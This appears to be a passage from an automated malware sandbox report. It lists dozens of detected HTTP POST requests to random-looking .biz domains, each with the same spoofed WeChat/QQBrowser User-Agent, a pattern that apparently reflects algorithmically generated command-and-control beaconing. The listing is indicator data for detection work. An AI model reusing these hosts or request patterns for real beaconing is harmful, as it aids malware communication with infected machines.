                Source: global trafficHTTP traffic detected: POST /wfcpepuolxclud HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /mwes HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /im HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /xhqdokiwwp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /na HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /koph HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /rifyadu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /lauq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /owesbtnhccxha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /rte HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ceabvuhcchcwyyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /gcfjbafgheaeck HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /uextgbni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /fvthsigvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /jftcpo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /jdfcrnyhggjio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /sarbnswr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /nhxpdndgorr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /mxlx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bss HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /hckdbdnsiwd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /bh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /dtupajxvn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /fkcgbfiiatbbgsse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /lfobofpdm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /wstlg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /sn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ohrgkx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ovauxeggsejjr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /vekxop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /gblgywtx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bjgrt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /tpndpotka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /dona HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /qylgmshijgs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /nur HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /wveyxjtgsxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /klflkg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cisadtlsyrfn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /xymnprgj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cjqgdtkxtfqqm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hmiutucdfnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /yhjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /om HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /gho HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ulgmbpj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /leqj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ixcnnbyrmpnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /iuqfwfkapu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ymsikktgwjcaw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /rvfsblrqhy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /wiuuagnokpngbsx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /kfmcpedbjr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /rifmhdkgmasf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /tbncyidxtibogxq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /eakdwqhsn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bcjrqnssupbqc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /taks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /qbllddvxueecww HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /jaypbwnkuad HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /om HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cnub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
